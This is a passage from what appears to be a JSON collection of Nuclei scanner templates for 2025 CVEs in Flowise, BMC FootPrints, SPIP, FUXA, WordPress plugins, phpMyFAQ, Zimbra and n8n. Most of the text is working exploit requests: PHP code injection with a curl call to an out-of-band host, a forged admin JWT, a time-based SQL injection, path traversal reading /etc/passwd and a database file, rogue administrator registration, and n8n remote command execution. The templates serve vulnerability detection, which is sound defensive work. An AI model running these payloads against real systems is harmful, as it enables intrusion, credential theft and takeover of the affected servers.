Content-Disposition: form-data; name=\"files\"; filename=\"?\"\n        Content-Type: text/plain\n\n        test\n        ------WebKitFormBoundary7MA4YWxkTrZu0gW--\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"EISDIR\"\n          - \".flowise/storage\"\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: chatflowId\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - 'storage/[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})'\n\n  - raw:\n      - |\n        GET /api/v1/get-upload-file?chatflowId={{chatflowId}}&chatId=/../../&fileName=database.sqlite HTTP/1.1\n        Host: {{Hostname}}\n        x-request-from: internal\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"SQLite format 3\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100e9f92c8d417dedff0f8af2076f16be3a904c8173c1c7c71e020b505d73c82d7e0220096686a52f3c2c74618f845c7d8099813ea4e844c2bb760a428b03e8c258517e:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-71324.yaml","vuln_id":"cve-2025-71324"},{"raw":"id: CVE-2025-71259\n\ninfo:\n  name: BMC FootPrints 'feedUrl' - Server-Side Request Forgery\n  author: watchTowr,DhiyaneshDk\n  severity: high\n  description: |\n    BMC FootPrints versions 20.20.02 through 20.24.01.001 contain a Server-Side Request Forgery (SSRF) vulnerability in the /footprints/servicedesk/externalfeed/RSS endpoint. The 'feedUrl' parameter allows unauthenticated attackers to force the server to make HTTP requests to arbitrary URLs, enabling access to internal services and bypassing firewall restrictions. This vulnerability is part of a pre-authenticated RCE chain when combined with CVE-2025-71257 (auth bypass) and CVE-2025-71260 (deserialization).\n  impact: |\n    Authenticated attackers can make the server send arbitrary outbound requests, potentially interacting with internal services or causing denial of service.\n  remediation: |\n    Apply the hotfixes released by BMC on September 2, 2025 for all affected branches. Update to the latest patched version of BMC FootPrints.\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n    cvss-score: 8.6\n    cve-id: CVE-2025-71259\n    epss-score: 0.12916\n    epss-percentile: 0.9613\n    cwe-id: CWE-918\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"/footprints/servicedesk/\"\n    product: footprints\n    vendor: bmc\n    fofa-query: body=\"/footprints/servicedesk/\"\n  reference:\n    - https://labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/\n    - https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-71259\n  tags: cve,cve2025,servicedesk,bmc-software,ssrf,oast,oob,footprints,bmc\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /footprints/servicedesk/passwordreset/request/ HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains(set_cookie, \"SEC_TOKEN=\")\n        internal: true\n\n  - raw:\n      - |\n        GET /footprints/servicedesk/externalfeed/RSS?feedUrl=http://{{interactsh-url}}&dataEncoding=x HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - dns\n# digest: 490a00463044022049c5726f640d1183b2da53eb5ec7a6e3c37b2a2f5e42d0de79fe1c9f899b8086022046cbc77d64251bcb6709bc70e2cd57393354bbdd687fb59ac7ce02b8ed1e8e3b:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-71259.yaml","vuln_id":"cve-2025-71259"},{"raw":"id: CVE-2025-71258\n\ninfo:\n  name: BMC FootPrints 'searchWeb' - Server-Side Request Forgery\n  author: watchTowr,DhiyaneshDk\n  severity: high\n  description: |\n    BMC FootPrints versions 20.20.02 through 20.24.01.001 contain a Server-Side Request Forgery (SSRF) vulnerability in the /footprints/servicedesk/import/searchWeb endpoint. The 'url' parameter allows unauthenticated attackers to force the server to make HTTP requests to arbitrary URLs, enabling access to internal services and bypassing firewall restrictions. This vulnerability is part of a pre-authenticated RCE chain when combined with CVE-2025-71257 (auth bypass) and CVE-2025-71260 (deserialization).\n  impact: |\n    Authenticated attackers can cause the server to make arbitrary outbound requests, potentially impacting system availability and internal network security.\n  remediation: |\n    Apply the hotfixes released by BMC on September 2, 2025 for all affected branches. Update to the latest patched version of BMC FootPrints.\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n    cvss-score: 8.6\n    cve-id: CVE-2025-71258\n    epss-score: 0.1743\n    epss-percentile: 0.96988\n    cwe-id: CWE-918\n  reference:\n    - https://labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/\n    - https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"BMC Software\"\n    product: footprints\n    vendor: bmc\n    fofa-query: body=\"/footprints/servicedesk/\"\n  tags: cve,cve2025,servicedesk,bmc-software,ssrf,oast,oob,footprints,bmc\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /footprints/servicedesk/passwordreset/request/ HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains(set_cookie, \"SEC_TOKEN=\")\n        internal: true\n\n  - raw:\n      - |\n        GET /footprints/servicedesk/import/searchWeb?url=http://{{interactsh-url}}&dataEncoding=x HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - dns\n# digest: 4a0a0047304502205f52fc5bfc8568b2e7cb35acb4d074d490759215db349b94028e6f4237f30d9c0221008f75044e01ef654bb0a7ebc50dc40f4ad0e0d39bf27c17cb827934450719a4c3:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-71258.yaml","vuln_id":"cve-2025-71258"},{"raw":"id: CVE-2025-71257\n\ninfo:\n  name: BMC FootPrints - Authentication Bypass\n  author: watchTowr,DhiyaneshDk\n  severity: medium\n  description: |\n    BMC FootPrints versions 20.20.02 through 20.24.01.001 contain an authentication bypass vulnerability in the password reset functionality. Unauthenticated attackers can access the /footprints/servicedesk/passwordreset/request/ endpoint to obtain a valid SEC_TOKEN session cookie without proper authentication. This vulnerability enables exploitation of other vulnerabilities in the chain including CVE-2025-71258 and CVE-2025-71259 (SSRF) and CVE-2025-71260 (deserialization RCE).\n  impact: |\n    Unauthenticated attackers can bypass access controls to access and modify application data and system resources.\n  remediation: |\n    Apply the hotfixes released by BMC on September 2, 2025 for all affected branches. Update to the latest patched version of BMC FootPrints.\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N\n    cvss-score: 6.5\n    cve-id: CVE-2025-71257\n    epss-score: 0.44576\n    epss-percentile: 0.98711\n    cwe-id: CWE-287\n  reference:\n    - https://labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/\n    - https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"/footprints/servicedesk/\"\n    product: footprints\n    vendor: bmc\n    fofa-query: body=\"/footprints/servicedesk/\"\n  tags: cve,cve2025,servicedesk,bmc-software,auth-bypass,footprints,bmc,vkev\n\nvariables:\n  string: \"{{to_lower(rand_base(8))}}\"\n\nhttp:\n  - raw:\n      - |\n        GET /footprints/servicedesk/passwordreset/request/ HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: word\n        part: set_cookie\n        words:\n          - \"SEC_TOKEN=\"\n# digest: 490a00463044022050e71a92c72887f724435264f444da0346531580ddfe5c8a81b0668b3836f3a602204204ca53bf665558a89aa61178fbbf77e2bfd69234e699f614cb06740360a6b7:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-71257.yaml","vuln_id":"cve-2025-71257"},{"raw":"id: CVE-2025-71243\n\ninfo:\n  name: SPIP Saisies - Remote Code Execution\n  author: omarkurt\n  severity: critical\n  description: |\n    SPIP Saisies plugin 5.4.0 through 5.11.0 contains a remote code execution caused by an unspecified flaw, letting attackers execute arbitrary code on the server, exploit requires no special conditions.\n  remediation: |\n    Update to version 5.11.1 or later.\n  impact:\n    Attackers can execute arbitrary code on the server, potentially leading to full system compromise.\n  reference:\n    - https://vulnerability.circl.lu/vuln/cve-2025-71243\n    - https://chocapikk.com/posts/2026/spip-saisies-rce/\n    - https://github.com/Chocapikk/CVE-2025-71243\n    - https://vulnerabletarget.com/VT-2025-71243\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-71243\n    epss-score: 0.05126\n    epss-percentile: 0.92012\n    cwe-id: CWE-94\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: spip\n    product: saisies\n    shodan-query: 'http.html:\"SPIP\"'\n    fofa-query: 'app=\"SPIP\"'\n  tags: cve,cve2025,spip,rce,oast,vkev\n\nvariables:\n  rce_payload: \"x'/><?php echo md5('{{randstr}}'); ?><input value='x\"\n  oob_payload: \"x'/><?php gethostbyname('{{interactsh-url}}'); ?><input value='x\"\n  oob_curl: \"x'/><?php system('curl+-s+{{interactsh-url}}'); ?><input value='x\"\n\nflow: http(1) && (http(2) || http(3) || http(4))\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(header, \"Composed-By: SPIP\")'\n          - 'contains(header, \"X-Spip-Cache:\")'\n        condition: or\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/spip.php?page=contact&_anciennes_valeurs={{url_encode(rce_payload)}}\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"{{md5(randstr)}}\")'\n          - 'status_code == 200'\n        condition: and\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/spip.php?page=contact&_anciennes_valeurs={{url_encode(oob_payload)}}\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(interactsh_protocol, \"dns\")'\n          - 'status_code == 200'\n        condition: and\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/spip.php?page=contact&_anciennes_valeurs={{url_encode(oob_curl)}}\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(interactsh_protocol, \"http\") || contains(interactsh_protocol, \"dns\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a004730450221008a131f64c490ab142665e2cc1a75eeb4b098b5d00f057165dd0f5476d0fc418e02207465f77c7b005323144ed2f7dcfebc49002e103294ab4b607dd269fe02987e2e:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-71243.yaml","vuln_id":"cve-2025-71243"},{"raw":"id: CVE-2025-69971\n\ninfo:\n  name: FUXA <= 1.2.7 - Hardcoded JWT Secret Authentication Bypass\n  author: trader642\n  severity: critical\n  description: |\n    FUXA v1.2.7 contains a hardcoded credentials vulnerability caused by use of a hard-coded secret key in server/api/jwt-helper.js, letting remote attackers forge admin tokens and bypass authentication, exploit requires no special conditions.\n  impact: |\n    Remote attackers can bypass authentication and gain full administrative access.\n  remediation: |\n    Update to the latest version that removes hard-coded credentials.\n  reference:\n    - https://github.com/frangoteam/FUXA/security/advisories/GHSA-32cc-x95p-fxcg\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-69971\n    - https://github.com/frangoteam/FUXA/blob/master/server/api/jwt-helper.js\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-69971\n    epss-score: 0.02081\n    epss-percentile: 0.80692\n    cwe-id: CWE-321\n    cpe: cpe:2.3:a:frangoteam:fuxa:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: frangoteam\n    product: fuxa\n    fofa-query: title=\"FUXA\"\n    shodan-query: title:\"FUXA\"\n  tags: cve,cve2025,fuxa,frangoteam,auth-bypass,hardcoded-credentials,jwt,scada,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /api/project HTTP/1.1\n        Host: {{Hostname}}\n        x-access-token: eyJhbGciOiAiSFMyNTYiLCAidHlwIjogIkpXVCJ9.eyJpZCI6ICJhZG1pbiIsICJncm91cHMiOiBbLTEsIDI1NV0sICJpYXQiOiAxNzAwMDAwMDAwLCAiZXhwIjogMjAwMDAwMDAwMH0.WEOs0b8pyK8Q7IoQtN3fpc0x0KlAKMAm78oPR9zg2Cg\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(header, \"application/json\")'\n          - 'contains_all(body, \"\\\"hmi\\\"\", \"\\\"server\\\"\", \"FuxaServer\")'\n        condition: and\n# digest: 4a0a00473045022100843eea511ca3e86839ef21178fd62773dad2735ffaa7564b0870be9efff4de6e022016c82eb5fc0fcaebb07f70d0bf93487ad1b34701d804b715daf5147b8c113872:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-69971.yaml","vuln_id":"cve-2025-69971"},{"raw":"id: CVE-2025-6970\n\ninfo:\n  name: WordPress Events Manager <= 7.0.3 - SQL Injection\n  author: iamnoooob,pdresearch\n  severity: critical\n  description: |\n    The Events Manager - Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to time-based SQL Injection via the 'orderby' parameter in all versions up to, and including, 7.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n  impact: |\n    An attacker can exploit this vulnerability to perform time-based SQL injection attacks, potentially extracting sensitive information from the database including user credentials, personal information, and other confidential data.\n  remediation: |\n    Update the Events Manager plugin to version 6.6.5 or 7.0.4 or later which fixes this vulnerability. If immediate update is not possible, consider temporarily disabling the plugin until the fix can be applied.\n  reference:\n    - https://wpscan.com/vulnerability/CVE-2025-6970\n    - https://patchstack.com/database/vulnerability/events-manager/wordpress-events-manager-calendar-bookings-tickets-and-more-plugin-7-0-3-unauthenticated-sql-injection-via-orderby-parameter\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/events-manager/events-manager-703-unauthenticated-sql-injection-via-orderby-parameter\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-6970\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-6970\n    cwe-id: CWE-89\n    epss-score: 0.65323\n    epss-percentile: 0.99223\n    cpe: cpe:2.3:a:wp-events-plugin:events_manager:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: wp-events-plugin\n    product: events_manager\n    publicwww-query: \"/wp-content/plugins/events-manager/\"\n  tags: cve,cve2025,events-manager,sqli,time-based,wordpress,wpscan,wp-plugin,wp,vuln\n\nhttp:\n  - raw:\n      - |\n        @timeout: 30s\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=search_events&orderby=1*(select(sleep(8)))\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"duration>=8\"\n          - \"status_code == 200\"\n          - \"contains_all(body, 'em-item-info', 'em-item-title', 'em-item-desc')\"\n        condition: and\n# digest: 4a0a0047304502200adabb712acb52f13ea47b4759369c4a0b386837f90fb5ad87f74b4596ca9ba9022100a9662b6b0700fa9914f583addbcfa81d5e4f36d827f3f1d022fdaface703a148:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-6970.yaml","vuln_id":"cve-2025-6970"},{"raw":"id: CVE-2025-69411\n\ninfo:\n  name: ionCube Tester Plus <= 1.3 - Local File Inclusion\n  author: pussycat0x\n  severity: high\n  description: |\n    The ionCube Tester Plus plugin for WordPress versions <= 1.3 is vulnerable to unauthenticated arbitrary file read via path traversal. The 'ininame' parameter in loader-wizard.php is not properly sanitized, allowing attackers to read  sensitive files such as wp-config.php and /etc/passwd without authentication.\n  remediation: |\n    Update to the latest version beyond 1.3.\n  impact:\n    Attackers can access unauthorized files, potentially exposing sensitive information or system files.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ioncube-tester-plus/ioncube-tester-plus-13-unauthenticated-arbitrary-file-download\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-69411\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2025-69411\n    epss-score: 0.01609\n    epss-percentile: 0.74847\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: ioncube\n    product: ioncube-tester-plus\n    framework: wordpress\n  tags: cve,cve2025,wordpress,wp,wp-plugin,lfi,ioncube-tester-plus\n\nflow: http(1) && http(2)\n\nhttp:\n  - method:\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/ioncube-tester-plus/readme.txt\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - compare_versions(version, '<= 1.3')\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        part: body\n        name: version\n        group: 1\n        regex:\n          - '(?i)Stable tag:\\s+([0-9.]+)'\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/ioncube-tester-plus/loader-wizard.php?page=phpconfig&download=1&ininame=../../../../../../../../etc/passwd\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains(content_type, 'text/plain')\n          - regex('root:.*:0:0:', body)\n          - status_code == 200\n        condition: and\n# digest: 490a0046304402207dd713272529fd3afb61d2f62fdebc429c83647215e7b3c20aa9dc5e342a5c19022065b136f6fbff5c9e9c70c8af3c63783d3780a51ed33b0850d05ec64b6fe26c72:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-69411.yaml","vuln_id":"cve-2025-69411"},{"raw":"id: CVE-2025-6934\n\ninfo:\n  name: The Opal Estate Pro – Property Management <= 1.7.5 - Unauthenticated Privilege Escalation\n  author: pussycat0x\n  severity: critical\n  description: |\n    The Opal Estate Pro plugin (≤ 1.7.5) is vulnerable to privilege escalation. Due to missing role restrictions in the on_register_user function, users can register with any role. This allows unauthenticated attackers to create administrator accounts.\n  impact: |\n    An attacker can exploit this vulnerability to register with administrator privileges, gaining complete control over the WordPress site.\n  remediation: |\n    Update the Opal Estate Pro plugin to a version newer than 1.7.5 when available, or remove the plugin if not essential.\n  reference:\n    - https://github.com/Nxploited/CVE-2025-6934/blob/main/README.md\n    - https://wordpress.org/plugins/opal-estate-pro/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-6934\n    epss-score: 0.27875\n    epss-percentile: 0.9801\n    cwe-id: CWE-269\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: themeforest\n    product: opal-estate-pro\n    publicwww-query: \"/wp-content/plugins/opal-estate-pro/\"\n  tags: cve,cve2025,wordpress,wp-plugin,wp,intrusive,plugin,opalestate,vuln\n\nflow: http(1) && http(2)\n\nvariables:\n  username: \"{{randstr}}\"\n  password: \"{{to_lower(rand_text_alpha(8))}}\"\n  email: \"{{randstr}}@{{rand_base(5)}}.com\"\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"opalestate-register-nonce\"\n        internal: true\n\n    extractors:\n      - type: regex\n        group: 1\n        name: nonce\n        part: body\n        internal: true\n        regex:\n          - 'name=\"opalestate-register-nonce\" value=\"([a-f0-9]+)\"'\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        username={{username}}&email={{email}}&password={{password}}&password1={{password}}&role=administrator&confirmed_register=on&opalestate-register-nonce={{nonce}}&_wp_http_referer=%2F&ajax=1&action=opalestate_register_form\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains(body, 'status\\\":true')\n          - status_code == 200\n        condition: and\n# digest: 490a00463044022029ef8497710fd97c892aab0725399b5fe4316bf4dd6d5f3c3cfd84a7b18ac3e702204772642050bf8b1d3fa9e776bb746189637a63b62199d06a747905062856af4b:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-6934.yaml","vuln_id":"cve-2025-6934"},{"raw":"id: CVE-2025-69200\n\ninfo:\n  name: phpMyFAQ - Configuration Backup Disclosure\n  author: Louay-075\n  severity: high\n  description: |\n    phpMyFAQ <= 4.0.16 contains an information disclosure vulnerability caused by unauthenticated access to configuration backup ZIP generation and download, letting remote attackers access sensitive configuration files, exploit requires no authentication.\n  impact: |\n    Remote attackers can access sensitive configuration files, exposing database credentials and enabling further compromise.\n  remediation: |\n    Update to version 4.0.16 or later.\n  reference:\n    - https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9cg9-4h4f-j6fg\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69200\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-69200\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2025-69200\n    epss-score: 0.02173\n    epss-percentile: 0.81512\n    cwe-id: CWE-202\n  metadata:\n    verified: true\n    shodan-query: 'http.title:\"phpMyFAQ\"'\n    max-request: 1\n    product: phpmyfaq\n    vendor: phpmyfaq\n  tags: cve,cve2025,phpmyfaq,backup,exposure,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /api/setup/backup HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: text/plain\n\n        4.1.0-RC\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"backupFile\":\"'\n          - '.zip'\n        condition: and\n\n      - type: word\n        words:\n          - \"error\"\n          - \"forbidden\"\n        negative: true\n\n      - type: word\n        part: content_type\n        words:\n          - application/json\n\n    extractors:\n      - type: json\n        name: backup_url\n        json:\n          - '.backupFile'\n# digest: 4a0a00473045022100aa9fe029abe8b51573b3641212e79f4276586248f287b62434b6c2270686bba3022007f17104ba77ff9bef7f11bc913d512958ddad59447e7ca7349dfe98d89c183c:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-69200.yaml","vuln_id":"cve-2025-69200"},{"raw":"id: CVE-2025-68645\n\ninfo:\n  name: Zimbra Collaboration - Local File Inclusion\n  author: DhiyaneshDk,sirifu4k1\n  severity: high\n  description: |\n    Zimbra Collaboration (ZCS) 10.0 and 10.1 contain a local file inclusion caused by improper handling of user-supplied parameters in the RestFilter servlet, letting unauthenticated remote attackers include arbitrary files from WebRoot, exploit requires crafted requests to /h/rest endpoint.\n  impact: |\n    Unauthenticated remote attackers can include arbitrary files from the WebRoot directory, potentially exposing sensitive information.\n  remediation: |\n    Update to the latest version of Zimbra Collaboration.\n  reference:\n    - https://x.com/sirifu4k1/status/2006031417088639064\n    - https://x.com/sirifu4k1/status/2007279822050078906?s=12&amp;t=ovaWmJElNlGyzadE74ZOgQ\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-68645\n  metadata:\n    max-request: 13\n    verified: true\n    shodan-query: http.title:\"Zimbra Collaboration Suite\"\n  tags: cve,cve2025,zimbra,zcs,lfi,vkev,kev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/{{path}}?javax.servlet.include.servlet_path=/WEB-INF/web.xml\"\n\n    payloads:\n      path:\n        - \"h/rest\"\n        - \"h/changepass\"\n        - \"h/imessage\"\n        - \"h/postLoginRedirect\"\n        - \"h/printcalls\"\n        - \"h/printcalendar\"\n        - \"h/printvoicemails\"\n        - \"h/printappointments\"\n        - \"h/printcontacts\"\n        - \"h/printconversations\"\n        - \"h/printmessage\"\n        - \"h/printtasks\"\n        - \"h/viewimages\"\n\n    stop-at-first-match: true\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"<?xml version\"\n          - \"web-app>\"\n          - \"Zimbra\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 490a00463044022063c1d833497a5af4b51f6958424f6fa0560b92b57e814bbc5e1f9ae484f07ea60220792947c7235b30bc667bae2d497a656e5e081fee626f1d672b9473bba2d73565:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-68645.yaml","vuln_id":"cve-2025-68645"},{"raw":"id: CVE-2025-68613\n\ninfo:\n  name: n8n - Remote Code Execution via Expression Injection\n  author: rxerium,PentesterFlow,MuhamadJuwandi\n  severity: critical\n  description: |\n    n8n < 1.120.4, 1.121.1, 1.122.0 contains a remote code execution caused by insufficient isolation in workflow expression evaluation, letting authenticated attackers execute arbitrary code with n8n process privileges. Exploit requires authentication.\n  impact: |\n    Authenticated attackers can execute arbitrary code with n8n process privileges, potentially leading to full system compromise.\n  remediation: |\n    Upgrade to versions 1.120.4, 1.121.1, or 1.122.0 or later.\n  reference:\n    - https://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-68613\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 9.9\n    cve-id: CVE-2025-68613\n    epss-score: 0.99105\n    epss-percentile: 0.99932\n    cwe-id: CWE-94\n  metadata:\n    vendor: n8n\n    product: n8n\n    verified: true\n    max-request: 7\n    shodan-query: http.favicon.hash:-831756631\n  tags: cve,cve2025,n8n,authenticated,rce,intrusive,vkev,kev,vuln\n\nvariables:\n  randstr: \"{{rand_base(8)}}\"\n  email: \"{{email}}\"\n  password: \"{{password}}\"\n\nflow: |\n  http(\"version-check\");\n  let email = template[\"email\"];\n  let password = template[\"password\"];\n  if (email && password && email.length > 0 && password.length > 0) {\n    http(\"login\") && http(\"create-workflow\") && http(\"run-workflow\") && http(\"get-results\") && http(\"delete-workflow\");\n  }\n\nhttp:\n  - id: version-check\n    raw:\n      - |\n        GET /signin HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n\n    extractors:\n      - type: regex\n        name: base64_content\n        group: 1\n        regex:\n          - '<meta name=\"n8n:config:sentry\" content=\"([A-Za-z0-9+/=]+)\"'\n        internal: true\n\n      - type: dsl\n        name: version\n        dsl:\n          - 'replace_regex(base64_decode(base64_content), \".*n8n@([0-9]+\\\\.[0-9]+\\\\.[0-9]+).*\", \"$1\")'\n        internal: true\n\n      - type: dsl\n        dsl:\n          - '\"n8n Version: \" + version'\n\n    matchers:\n      - type: dsl\n        name: version_check\n        dsl:\n          - '(compare_versions(version, \">= 0.211.0\") && compare_versions(version, \"< 1.120.4\")) || (compare_versions(version, \">= 1.121.0\") && compare_versions(version, \"< 1.121.1\"))'\n          - 'contains(body, \"<title>n8n.io\")'\n        condition: and\n\n  - id: login\n    raw:\n      - |\n        POST /rest/login HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"emailOrLdapLoginId\":\"{{email}}\",\"password\":\"{{password}}\"}\n\n    matchers:\n      - type: status\n        status:\n          - 200\n        internal: true\n\n  - id: create-workflow\n    raw:\n      - |\n        POST /rest/workflows HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"name\":\"rce-test-{{randstr}}\",\"active\":false,\"nodes\":[{\"parameters\":{},\"name\":\"Manual Trigger\",\"type\":\"n8n-nodes-base.manualTrigger\",\"typeVersion\":1,\"position\":[250,300],\"id\":\"trigger-{{randstr}}\"},{\"parameters\":{\"values\":{\"string\":[{\"name\":\"rce_result\",\"value\":\"={{ (function() { var require = this.process.mainModule.require; var execSync = require('child_process').execSync; return execSync('whoami && id && uname -a').toString(); })() }}\"}]}},\"name\":\"RCE Test\",\"type\":\"n8n-nodes-base.set\",\"typeVersion\":2,\"position\":[450,300],\"id\":\"set-{{randstr}}\"}],\"connections\":{\"Manual Trigger\":{\"main\":[[{\"node\":\"RCE Test\",\"type\":\"main\",\"index\":0}]]}},\"settings\":{}}\n\n    extractors:\n      - type: regex\n        name: workflow_id\n        part: body\n        internal: true\n        regex:\n          - '\"createdAt\":\"[^\"]+\",\"id\":\"([a-zA-Z0-9]+)\"'\n        group: 1\n\n    matchers:\n      - type: status\n        status:\n          - 200\n        internal: true\n\n  - id: run-workflow\n    raw:\n      - |\n        POST /rest/workflows/{{workflow_id}}/run HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"workflowData\":{\"id\":\"{{workflow_id}}\",\"name\":\"rce-test-{{randstr}}\",\"active\":false,\"nodes\":[{\"parameters\":{},\"name\":\"Manual 